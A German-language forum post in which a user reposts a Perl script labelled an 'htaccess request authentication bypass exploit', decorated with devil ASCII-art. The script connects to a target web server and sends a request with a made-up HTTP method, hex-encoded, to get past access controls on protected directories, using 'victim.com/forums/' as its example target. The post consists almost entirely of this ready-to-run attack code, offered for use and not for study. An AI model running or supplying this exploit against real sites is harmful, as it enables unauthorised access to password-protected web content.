Wahrscheinlich eine .htaccess
EBFE hat vor kurzem ein htaccess Exploit gepostet.
Ich nehme mir mal die Freiheit es hier rein zu kopieren
Code:
use IO::Socket;
use strict;
use warnings;
# __________________________________________________
#
# ------------------------------------------------
# | htaccess request authentication bypass exploit |
# ------------------------------------------------
#
# written by katharsis - www.katharsis.x2.to
#
# __________________________________________________
<<i;
( )
|\ _,--------._ / |
| `.,' `. / |
` ' ,-' '
\/ ( /
,-. ,-. `__,'
| \) ,' ) ,'.` |
`.#/) '.#_,' ) ))|
/ (_.)\ . -'//
( /\____/\ ) )`'\
\ |V----V|| ' , \
|`- -- -' ,' \ \ _____
___ | .' \ \ `._,-' `-
`.__,`---^---' \ ` -'
-.______ \ . / ______,-
`. ,'
The devil is and always has been a gentleman.
i
my $host = shift;
my $file = shift;
print "\n[ htaccess request authentication bypass exploit ]\n";
if (!$file)
{
print "\n usage htxploit.pl [host] [directory / file]";
print "\n example htxploit.pl www.victim.com /forums/\n\n";
exit;
}
my $socket = new IO::Socket::INET (
PeerAddr => $host,
PeerPort => '80',
Proto => 'tcp',
);
my $packet =
"\x4D\x58\x48\x5A\x4D\x58\x20".$file.
"\x20\x48\x54\x54\x50\x2F\x31\x2E\x31\n".
"\x48\x6F\x73\x74\x3A\x20".$host."\n\n\n";
print $socket $packet;
while(<$socket>)
{
print;
}
close($socket);